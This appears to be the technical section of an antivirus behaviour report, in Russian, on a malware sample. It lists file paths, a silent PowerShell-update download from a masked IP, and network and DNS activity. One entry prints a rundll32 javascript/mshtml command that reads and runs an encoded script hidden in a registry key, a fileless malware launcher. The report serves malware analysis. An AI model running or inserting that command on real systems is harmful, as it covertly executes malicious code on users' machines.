Техническая информация
- '%TEMP%\WindowsXP-KB968930-x86-ENG.exe' /quiet /norestart
- '%TEMP%\WindowsXP-KB968930-x86-ENG.exe' (загружен из сети Интернет)
- '<SYSTEM32>\rundll32.exe' javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCR\\clsid\\{73e709ea-5d93-4b2e-bbb0-99b7938da9e4}\\localserver32\\a")+"\74/script>")
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\WindowsXP-KB968930-x86-ENG[1].exe
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe.tmp
- %TEMP%\WindowsXP-KB968930-x86-ENG.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\WindowsXP-KB968930-x86-ENG[1].exe
- '20#.#6.232.182':80
- 'localhost':1036
- 20#.#6.232.182/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
- DNS ASK do#####d.microsoft.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'